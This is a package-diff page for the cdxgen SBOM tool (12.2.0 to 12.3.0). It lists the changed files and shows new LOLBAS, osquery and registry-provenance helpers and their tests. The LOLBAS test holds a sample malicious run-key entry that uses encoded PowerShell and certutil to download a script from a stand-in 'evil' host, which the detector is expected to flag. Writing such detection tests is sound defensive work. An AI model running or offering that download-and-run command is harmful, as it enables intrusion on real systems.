npm - @cyclonedx/cdxgen - Versions diffs - 12.2.0 → 12.3.0 - Mend

@cyclonedx/cdxgen 12.2.0 → 12.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (181) hide show

package/README.md +242 -90
package/bin/audit.js +191 -0
package/bin/cdxgen.js +532 -168
package/bin/convert.js +99 -0
package/bin/evinse.js +23 -0
package/bin/repl.js +339 -8
package/bin/sign.js +8 -0
package/bin/validate.js +8 -0
package/bin/verify.js +8 -0
package/data/container-knowledge-index.json +125 -0
package/data/gtfobins-index.json +6296 -0
package/data/lolbas-index.json +150 -0
package/data/queries-darwin.json +63 -3
package/data/queries-win.json +45 -3
package/data/queries.json +74 -2
package/data/rules/chrome-extensions.yaml +240 -0
package/data/rules/ci-permissions.yaml +478 -18
package/data/rules/container-risk.yaml +270 -0
package/data/rules/obom-runtime.yaml +891 -0
package/data/rules/package-integrity.yaml +49 -0
package/data/spdx-export.schema.json +6794 -0
package/data/spdx-model-v3.0.1.jsonld +15999 -0
package/lib/audit/index.js +1924 -0
package/lib/audit/index.poku.js +1488 -0
package/lib/audit/progress.js +137 -0
package/lib/audit/progress.poku.js +188 -0
package/lib/audit/reporters.js +618 -0
package/lib/audit/scoring.js +310 -0
package/lib/audit/scoring.poku.js +341 -0
package/lib/audit/targets.js +260 -0
package/lib/audit/targets.poku.js +331 -0
package/lib/cli/index.js +276 -68
package/lib/cli/index.poku.js +368 -0
package/lib/helpers/analyzer.js +1052 -5
package/lib/helpers/analyzer.poku.js +301 -0
package/lib/helpers/annotationFormatter.js +49 -0
package/lib/helpers/annotationFormatter.poku.js +44 -0
package/lib/helpers/bomUtils.js +36 -0
package/lib/helpers/bomUtils.poku.js +51 -0
package/lib/helpers/caxa.js +2 -2
package/lib/helpers/chromextutils.js +1153 -0
package/lib/helpers/chromextutils.poku.js +493 -0
package/lib/helpers/ciParsers/githubActions.js +1632 -45
package/lib/helpers/ciParsers/githubActions.poku.js +853 -1
package/lib/helpers/containerRisk.js +186 -0
package/lib/helpers/containerRisk.poku.js +52 -0
package/lib/helpers/depsUtils.js +16 -0
package/lib/helpers/depsUtils.poku.js +58 -1
package/lib/helpers/display.js +245 -61
package/lib/helpers/display.poku.js +162 -2
package/lib/helpers/exportUtils.js +123 -0
package/lib/helpers/exportUtils.poku.js +60 -0
package/lib/helpers/formulationParsers.js +69 -0
package/lib/helpers/formulationParsers.poku.js +44 -0
package/lib/helpers/gtfobins.js +189 -0
package/lib/helpers/gtfobins.poku.js +49 -0
package/lib/helpers/lolbas.js +267 -0
package/lib/helpers/lolbas.poku.js +39 -0
package/lib/helpers/osqueryTransform.js +84 -0
package/lib/helpers/osqueryTransform.poku.js +49 -0
package/lib/helpers/provenanceUtils.js +193 -0
package/lib/helpers/provenanceUtils.poku.js +145 -0
package/lib/helpers/pylockutils.js +281 -0
package/lib/helpers/pylockutils.poku.js +48 -0
package/lib/helpers/registryProvenance.js +793 -0
package/lib/helpers/registryProvenance.poku.js +452 -0
package/lib/helpers/remote/dependency-track.js +84 -0
package/lib/helpers/remote/dependency-track.poku.js +119 -0
package/lib/helpers/source.js +1267 -0
package/lib/helpers/source.poku.js +771 -0
package/lib/helpers/spdxUtils.js +97 -0
package/lib/helpers/spdxUtils.poku.js +70 -0
package/lib/helpers/table.js +384 -0
package/lib/helpers/table.poku.js +186 -0
package/lib/helpers/unicodeScan.js +147 -0
package/lib/helpers/unicodeScan.poku.js +45 -0
package/lib/helpers/utils.js +882 -136
package/lib/helpers/utils.poku.js +995 -91
package/lib/managers/binary.js +29 -5
package/lib/managers/docker.js +179 -52
package/lib/managers/docker.poku.js +327 -28
package/lib/managers/oci.js +107 -23
package/lib/managers/oci.poku.js +132 -0
package/lib/server/openapi.yaml +50 -0
package/lib/server/server.js +228 -331
package/lib/server/server.poku.js +220 -5
package/lib/stages/postgen/annotator.js +7 -0
package/lib/stages/postgen/annotator.poku.js +40 -0
package/lib/stages/postgen/auditBom.js +20 -5
package/lib/stages/postgen/auditBom.poku.js +1729 -67
package/lib/stages/postgen/postgen.js +40 -0
package/lib/stages/postgen/postgen.poku.js +47 -0
package/lib/stages/postgen/ruleEngine.js +80 -2
package/lib/stages/postgen/spdxConverter.js +796 -0
package/lib/stages/postgen/spdxConverter.poku.js +341 -0
package/lib/validator/bomValidator.js +232 -0
package/lib/validator/bomValidator.poku.js +70 -0
package/lib/validator/complianceRules.js +70 -7
package/lib/validator/complianceRules.poku.js +30 -0
package/lib/validator/reporters/annotations.js +2 -2
package/lib/validator/reporters/console.js +13 -2
package/lib/validator/reporters.poku.js +13 -0
package/package.json +10 -8
package/types/bin/audit.d.ts +3 -0
package/types/bin/audit.d.ts.map +1 -0
package/types/bin/convert.d.ts +3 -0
package/types/bin/convert.d.ts.map +1 -0
package/types/bin/repl.d.ts.map +1 -1
package/types/lib/audit/index.d.ts +115 -0
package/types/lib/audit/index.d.ts.map +1 -0
package/types/lib/audit/progress.d.ts +27 -0
package/types/lib/audit/progress.d.ts.map +1 -0
package/types/lib/audit/reporters.d.ts +35 -0
package/types/lib/audit/reporters.d.ts.map +1 -0
package/types/lib/audit/scoring.d.ts +35 -0
package/types/lib/audit/scoring.d.ts.map +1 -0
package/types/lib/audit/targets.d.ts +63 -0
package/types/lib/audit/targets.d.ts.map +1 -0
package/types/lib/cli/index.d.ts +8 -0
package/types/lib/cli/index.d.ts.map +1 -1
package/types/lib/helpers/analyzer.d.ts +13 -0
package/types/lib/helpers/analyzer.d.ts.map +1 -1
package/types/lib/helpers/annotationFormatter.d.ts +23 -0
package/types/lib/helpers/annotationFormatter.d.ts.map +1 -0
package/types/lib/helpers/bomUtils.d.ts +5 -0
package/types/lib/helpers/bomUtils.d.ts.map +1 -0
package/types/lib/helpers/chromextutils.d.ts +97 -0
package/types/lib/helpers/chromextutils.d.ts.map +1 -0
package/types/lib/helpers/ciParsers/githubActions.d.ts +3 -8
package/types/lib/helpers/ciParsers/githubActions.d.ts.map +1 -1
package/types/lib/helpers/containerRisk.d.ts +17 -0
package/types/lib/helpers/containerRisk.d.ts.map +1 -0
package/types/lib/helpers/depsUtils.d.ts.map +1 -1
package/types/lib/helpers/display.d.ts +4 -1
package/types/lib/helpers/display.d.ts.map +1 -1
package/types/lib/helpers/exportUtils.d.ts +40 -0
package/types/lib/helpers/exportUtils.d.ts.map +1 -0
package/types/lib/helpers/formulationParsers.d.ts.map +1 -1
package/types/lib/helpers/gtfobins.d.ts +17 -0
package/types/lib/helpers/gtfobins.d.ts.map +1 -0
package/types/lib/helpers/lolbas.d.ts +16 -0
package/types/lib/helpers/lolbas.d.ts.map +1 -0
package/types/lib/helpers/osqueryTransform.d.ts +7 -0
package/types/lib/helpers/osqueryTransform.d.ts.map +1 -0
package/types/lib/helpers/provenanceUtils.d.ts +90 -0
package/types/lib/helpers/provenanceUtils.d.ts.map +1 -0
package/types/lib/helpers/pylockutils.d.ts +51 -0
package/types/lib/helpers/pylockutils.d.ts.map +1 -0
package/types/lib/helpers/registryProvenance.d.ts +17 -0
package/types/lib/helpers/registryProvenance.d.ts.map +1 -0
package/types/lib/helpers/remote/dependency-track.d.ts +16 -0
package/types/lib/helpers/remote/dependency-track.d.ts.map +1 -0
package/types/lib/helpers/source.d.ts +141 -0
package/types/lib/helpers/source.d.ts.map +1 -0
package/types/lib/helpers/spdxUtils.d.ts +2 -0
package/types/lib/helpers/spdxUtils.d.ts.map +1 -0
package/types/lib/helpers/table.d.ts +6 -0
package/types/lib/helpers/table.d.ts.map +1 -0
package/types/lib/helpers/unicodeScan.d.ts +46 -0
package/types/lib/helpers/unicodeScan.d.ts.map +1 -0
package/types/lib/helpers/utils.d.ts +30 -11
package/types/lib/helpers/utils.d.ts.map +1 -1
package/types/lib/managers/binary.d.ts.map +1 -1
package/types/lib/managers/docker.d.ts.map +1 -1
package/types/lib/managers/oci.d.ts.map +1 -1
package/types/lib/server/server.d.ts +0 -35
package/types/lib/server/server.d.ts.map +1 -1
package/types/lib/stages/postgen/annotator.d.ts.map +1 -1
package/types/lib/stages/postgen/auditBom.d.ts.map +1 -1
package/types/lib/stages/postgen/postgen.d.ts.map +1 -1
package/types/lib/stages/postgen/ruleEngine.d.ts.map +1 -1
package/types/lib/stages/postgen/spdxConverter.d.ts +11 -0
package/types/lib/stages/postgen/spdxConverter.d.ts.map +1 -0
package/types/lib/validator/bomValidator.d.ts +1 -0
package/types/lib/validator/bomValidator.d.ts.map +1 -1
package/types/lib/validator/complianceRules.d.ts.map +1 -1
package/types/lib/validator/reporters/console.d.ts.map +1 -1
package/types/bin/dependencies.d.ts +0 -3
package/types/bin/dependencies.d.ts.map +0 -1
package/types/bin/licenses.d.ts +0 -3
package/types/bin/licenses.d.ts.map +0 -1

package/lib/helpers/lolbas.poku.js ADDED Viewed

@@ -0,0 +1,39 @@
+import { strict as assert } from "node:assert";
+import { describe, it } from "poku";
+import { createLolbasProperties, getLolbasMetadata } from "./lolbas.js";
+describe("lolbas helpers", () => {
+  it("resolves extensionless aliases to canonical LOLBAS executables", () => {
+    const metadata = getLolbasMetadata("powershell");
+    assert.ok(metadata);
+    assert.strictEqual(metadata.canonicalName, "powershell.exe");
+    assert.ok(metadata.functions.includes("script-execution"));
+    assert.ok(metadata.attackTechniques.includes("T1059.001"));
+  });
+  it("resolves fully qualified Windows paths", () => {
+    const metadata = getLolbasMetadata("C:\\Windows\\System32\\regsvr32.exe");
+    assert.ok(metadata);
+    assert.strictEqual(metadata.canonicalName, "regsvr32.exe");
+    assert.ok(metadata.riskTags.includes("proxy-execution"));
+  });
+  it("creates aggregated properties for osquery rows with LOLBAS matches", () => {
+    const properties = createLolbasProperties("windows_run_keys", {
+      description:
+        "powershell -enc AAAA; certutil.exe -urlcache -f https://evil/p.ps1 p.ps1",
+      key: "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
+    });
+    const propertyMap = Object.fromEntries(
+      properties.map((property) => [property.name, property.value]),
+    );
+    assert.strictEqual(propertyMap["cdx:lolbas:matched"], "true");
+    assert.ok(propertyMap["cdx:lolbas:names"].includes("powershell.exe"));
+    assert.ok(propertyMap["cdx:lolbas:names"].includes("certutil.exe"));
+    assert.ok(propertyMap["cdx:lolbas:functions"].includes("download"));
+    assert.ok(propertyMap["cdx:lolbas:attackTechniques"].includes("T1059.001"));
+    assert.ok(propertyMap["cdx:lolbas:matchFields"].includes("description"));
+  });
+});

package/lib/helpers/osqueryTransform.js ADDED Viewed

@@ -0,0 +1,84 @@
+import { PackageURL } from "packageurl-js";
+export function deriveOsQueryVersion(res) {
+  return (
+    res.version ||
+    res.hotfix_id ||
+    res.hardware_version ||
+    res.port ||
+    res.pid ||
+    res.subject_key_id ||
+    res.interface ||
+    res.instance_id
+  );
+}
+export function deriveOsQueryName(res, singleResult, queryName) {
+  let name =
+    res.name ||
+    res.device_id ||
+    res.hotfix_id ||
+    res.uuid ||
+    res.serial ||
+    res.pid ||
+    res.address ||
+    res.ami_id ||
+    res.interface ||
+    res.client_app_id;
+  if (!name && singleResult && queryName) {
+    name = queryName;
+  }
+  return name;
+}
+export function deriveOsQueryPublisher(res) {
+  const publisher =
+    res.publisher ||
+    res.maintainer ||
+    res.creator ||
+    res.manufacturer ||
+    res.provider ||
+    "";
+  return publisher === "null" ? "" : publisher;
+}
+export function deriveOsQueryDescription(res) {
+  return (
+    res.description ||
+    res.summary ||
+    res.arguments ||
+    res.device ||
+    res.codename ||
+    res.section ||
+    res.status ||
+    res.identifier ||
+    res.components ||
+    ""
+  );
+}
+export function sanitizeOsQueryIdentity(value) {
+  return String(value || "")
+    .replace(/ /g, "+")
+    .replace(/[:%]/g, "-")
+    .replace(/^[@{]/g, "")
+    .replace(/[}]$/g, "");
+}
+export function createOsQueryPurl(
+  purlType,
+  group,
+  name,
+  version,
+  qualifiers,
+  subpath,
+) {
+  return new PackageURL(
+    purlType || "swid",
+    group,
+    name,
+    version || "",
+    qualifiers,
+    subpath,
+  ).toString();
+}

package/lib/helpers/osqueryTransform.poku.js ADDED Viewed

@@ -0,0 +1,49 @@
+import { assert, describe, it } from "poku";
+import {
+  createOsQueryPurl,
+  deriveOsQueryDescription,
+  deriveOsQueryName,
+  deriveOsQueryPublisher,
+  deriveOsQueryVersion,
+  sanitizeOsQueryIdentity,
+} from "./osqueryTransform.js";
+describe("osqueryTransform helpers", () => {
+  it("derives version, name, publisher, and description from osquery rows", () => {
+    const row = {
+      pid: "1024",
+      provider: "null",
+      summary: "sample description",
+    };
+    assert.strictEqual(deriveOsQueryVersion(row), "1024");
+    assert.strictEqual(deriveOsQueryName(row, false), "1024");
+    assert.strictEqual(deriveOsQueryPublisher(row), "");
+    assert.strictEqual(deriveOsQueryDescription(row), "sample description");
+  });
+  it("falls back to query name for single-row synthetic entries", () => {
+    const row = {};
+    assert.strictEqual(deriveOsQueryName(row, true, "os-image"), "os-image");
+  });
+  it("sanitizes osquery identity strings used in purl fields", () => {
+    assert.strictEqual(
+      sanitizeOsQueryIdentity("{My App:%Name}"),
+      "My+App--Name",
+    );
+  });
+  it("creates valid purl strings for osquery-derived components", () => {
+    const purl = createOsQueryPurl(
+      "swid",
+      "microsoft",
+      "windows+11",
+      "22H2",
+      undefined,
+      "windows",
+    );
+    assert.ok(purl.startsWith("pkg:swid/microsoft/"));
+    assert.ok(purl.includes("@22H2"));
+  });
+});

package/lib/helpers/provenanceUtils.js ADDED Viewed

@@ -0,0 +1,193 @@
+const NPM_PROVENANCE_URL_PROPERTY = "cdx:npm:provenanceUrl";
+const NPM_TRUSTED_PUBLISHING_PROPERTY = "cdx:npm:trustedPublishing";
+const PYPI_PROVENANCE_URL_PROPERTY = "cdx:pypi:provenanceUrl";
+const PYPI_TRUSTED_PUBLISHING_PROPERTY = "cdx:pypi:trustedPublishing";
+export const NPM_PROVENANCE_EVIDENCE_PROPERTIES = [
+  NPM_PROVENANCE_URL_PROPERTY,
+  "cdx:npm:provenanceDigest",
+  "cdx:npm:provenanceKeyId",
+  "cdx:npm:provenancePredicateType",
+  "cdx:npm:provenanceSignature",
+  "cdx:npm:artifactIntegrity",
+  "cdx:npm:artifactShasum",
+];
+export const PYPI_PROVENANCE_EVIDENCE_PROPERTIES = [
+  PYPI_PROVENANCE_URL_PROPERTY,
+  "cdx:pypi:provenanceDigest",
+  "cdx:pypi:provenanceKeyId",
+  "cdx:pypi:provenancePredicateType",
+  "cdx:pypi:provenanceSignature",
+  "cdx:pypi:artifactDigestSha256",
+  "cdx:pypi:artifactDigestBlake2b256",
+  "cdx:pypi:artifactDigestMd5",
+];
+export const REGISTRY_PROVENANCE_EVIDENCE_PROPERTIES = [
+  ...NPM_PROVENANCE_EVIDENCE_PROPERTIES,
+  ...PYPI_PROVENANCE_EVIDENCE_PROPERTIES,
+];
+export const TRUSTED_PUBLISHING_PROPERTIES = [
+  NPM_TRUSTED_PUBLISHING_PROPERTY,
+  PYPI_TRUSTED_PUBLISHING_PROPERTY,
+];
+export const REGISTRY_PROVENANCE_ICON = "🛡";
+/**
+ * Return a component property value by name.
+ *
+ * @param {object} component CycloneDX component
+ * @param {string} propertyName Property name to look up
+ * @returns {string | undefined} Property value if present
+ */
+export function getComponentPropertyValue(component, propertyName) {
+  return component?.properties?.find((prop) => prop?.name === propertyName)
+    ?.value;
+}
+/**
+ * Return a property value by name from a raw properties array.
+ *
+ * @param {object[]} properties CycloneDX properties array
+ * @param {string} propertyName Property name to look up
+ * @returns {string | undefined} Property value if present
+ */
+export function getPropertyValue(properties, propertyName) {
+  return properties?.find((prop) => prop?.name === propertyName)?.value;
+}
+/**
+ * Check whether any of the supplied properties exist and carry a value.
+ *
+ * @param {object[]} properties CycloneDX properties array
+ * @param {string[]} propertyNames Property names to test
+ * @returns {boolean} True when any named property has a non-empty value
+ */
+export function hasAnyPropertyValue(properties, propertyNames) {
+  return propertyNames.some((propertyName) =>
+    Boolean(getPropertyValue(properties, propertyName)),
+  );
+}
+/**
+ * Determine whether a raw properties array includes trusted publishing metadata.
+ *
+ * @param {object[]} properties CycloneDX properties array
+ * @returns {boolean} True when trusted publishing is recorded for npm or PyPI
+ */
+export function hasTrustedPublishingProperties(properties) {
+  return TRUSTED_PUBLISHING_PROPERTIES.some(
+    (propertyName) => getPropertyValue(properties, propertyName) === "true",
+  );
+}
+/**
+ * Determine whether a raw properties array includes direct registry provenance evidence.
+ *
+ * @param {object[]} properties CycloneDX properties array
+ * @returns {boolean} True when direct provenance evidence is present
+ */
+export function hasRegistryProvenanceEvidenceProperties(properties) {
+  return hasAnyPropertyValue(
+    properties,
+    REGISTRY_PROVENANCE_EVIDENCE_PROPERTIES,
+  );
+}
+/**
+ * Determine whether a component includes trusted publishing metadata.
+ *
+ * @param {object} component CycloneDX component
+ * @returns {boolean} True when trusted publishing is recorded for npm or PyPI
+ */
+export function hasComponentTrustedPublishing(component) {
+  return hasTrustedPublishingProperties(component?.properties);
+}
+/**
+ * Determine whether a component includes direct registry provenance evidence.
+ *
+ * @param {object} component CycloneDX component
+ * @returns {boolean} True when provenance URL, digests, signatures, or key IDs exist
+ */
+export function hasComponentRegistryProvenanceEvidence(component) {
+  return hasRegistryProvenanceEvidenceProperties(component?.properties);
+}
+/**
+ * Determine whether a component includes registry provenance metadata.
+ *
+ * @param {object} component CycloneDX component
+ * @returns {boolean} True when provenance or trusted publishing metadata exists
+ */
+export function hasComponentRegistryProvenance(component) {
+  return (
+    hasComponentTrustedPublishing(component) ||
+    hasComponentRegistryProvenanceEvidence(component)
+  );
+}
+/**
+ * Filter components to those carrying trusted publishing metadata.
+ *
+ * @param {object[]} components BOM components
+ * @returns {object[]} Trusted-publishing-backed components
+ */
+export function getTrustedComponents(components) {
+  if (!Array.isArray(components)) {
+    return [];
+  }
+  return components.filter((component) =>
+    hasComponentTrustedPublishing(component),
+  );
+}
+/**
+ * Filter components to those carrying direct registry provenance evidence.
+ *
+ * @param {object[]} components BOM components
+ * @returns {object[]} Provenance-backed components
+ */
+export function getProvenanceComponents(components) {
+  if (!Array.isArray(components)) {
+    return [];
+  }
+  return components.filter((component) =>
+    hasComponentRegistryProvenanceEvidence(component),
+  );
+}
+/**
+ * Count components with trusted publishing metadata by registry ecosystem.
+ *
+ * @param {object[]} components BOM components
+ * @returns {{npm: number, pypi: number, total: number}} Trusted publishing counts
+ */
+export function getTrustedPublishingComponentCounts(components) {
+  const counts = {
+    npm: 0,
+    pypi: 0,
+    total: 0,
+  };
+  if (!Array.isArray(components)) {
+    return counts;
+  }
+  for (const component of components) {
+    const npmTrustedPublishing =
+      getComponentPropertyValue(component, NPM_TRUSTED_PUBLISHING_PROPERTY) ===
+      "true";
+    const pypiTrustedPublishing =
+      getComponentPropertyValue(component, PYPI_TRUSTED_PUBLISHING_PROPERTY) ===
+      "true";
+    if (npmTrustedPublishing) {
+      counts.npm += 1;
+    }
+    if (pypiTrustedPublishing) {
+      counts.pypi += 1;
+    }
+    if (npmTrustedPublishing || pypiTrustedPublishing) {
+      counts.total += 1;
+    }
+  }
+  return counts;
+}

package/lib/helpers/provenanceUtils.poku.js ADDED Viewed

@@ -0,0 +1,145 @@
+import { assert, describe, it } from "poku";
+import {
+  getPropertyValue,
+  getProvenanceComponents,
+  getTrustedComponents,
+  getTrustedPublishingComponentCounts,
+  hasAnyPropertyValue,
+  hasComponentRegistryProvenance,
+  hasComponentRegistryProvenanceEvidence,
+  hasComponentTrustedPublishing,
+  hasRegistryProvenanceEvidenceProperties,
+  hasTrustedPublishingProperties,
+} from "./provenanceUtils.js";
+describe("provenanceUtils", () => {
+  const npmTrustedComponent = {
+    name: "left-pad",
+    properties: [
+      {
+        name: "cdx:npm:trustedPublishing",
+        value: "true",
+      },
+    ],
+  };
+  const pypiProvenanceComponent = {
+    name: "requests",
+    properties: [
+      {
+        name: "cdx:pypi:provenanceUrl",
+        value: "https://pypi.org/integrity/example",
+      },
+    ],
+  };
+  const plainComponent = {
+    name: "lodash",
+    properties: [],
+  };
+  it("detects trusted publishing and registry provenance metadata", () => {
+    assert.strictEqual(
+      hasComponentTrustedPublishing(npmTrustedComponent),
+      true,
+    );
+    assert.strictEqual(
+      hasComponentRegistryProvenance(pypiProvenanceComponent),
+      true,
+    );
+    assert.strictEqual(
+      hasComponentRegistryProvenanceEvidence(pypiProvenanceComponent),
+      true,
+    );
+    assert.strictEqual(hasComponentRegistryProvenance(plainComponent), false);
+  });
+  it("filters trusted components and counts trusted publishing by ecosystem", () => {
+    assert.deepStrictEqual(
+      getTrustedComponents([
+        plainComponent,
+        npmTrustedComponent,
+        pypiProvenanceComponent,
+      ]).map((component) => component.name),
+      ["left-pad"],
+    );
+    assert.deepStrictEqual(
+      getProvenanceComponents([
+        plainComponent,
+        npmTrustedComponent,
+        pypiProvenanceComponent,
+      ]).map((component) => component.name),
+      ["requests"],
+    );
+    assert.deepStrictEqual(
+      getTrustedPublishingComponentCounts([
+        npmTrustedComponent,
+        {
+          name: "urllib3",
+          properties: [
+            {
+              name: "cdx:pypi:trustedPublishing",
+              value: "true",
+            },
+          ],
+        },
+        plainComponent,
+      ]),
+      {
+        npm: 1,
+        pypi: 1,
+        total: 2,
+      },
+    );
+  });
+  it("supports property-array checks used by display and audit code", () => {
+    const properties = [
+      {
+        name: "cdx:npm:provenanceKeyId",
+        value: "sigstore-key",
+      },
+      {
+        name: "cdx:npm:trustedPublishing",
+        value: "true",
+      },
+    ];
+    assert.strictEqual(
+      getPropertyValue(properties, "cdx:npm:provenanceKeyId"),
+      "sigstore-key",
+    );
+    assert.strictEqual(
+      hasAnyPropertyValue(properties, ["cdx:npm:provenanceKeyId"]),
+      true,
+    );
+    assert.strictEqual(hasTrustedPublishingProperties(properties), true);
+    assert.strictEqual(
+      hasRegistryProvenanceEvidenceProperties(properties),
+      true,
+    );
+  });
+  it("counts total trusted publishing components once even with multiple registry flags", () => {
+    assert.deepStrictEqual(
+      getTrustedPublishingComponentCounts([
+        {
+          name: "dual-published",
+          properties: [
+            {
+              name: "cdx:npm:trustedPublishing",
+              value: "true",
+            },
+            {
+              name: "cdx:pypi:trustedPublishing",
+              value: "true",
+            },
+          ],
+        },
+      ]),
+      {
+        npm: 1,
+        pypi: 1,
+        total: 1,
+      },
+    );
+  });
+});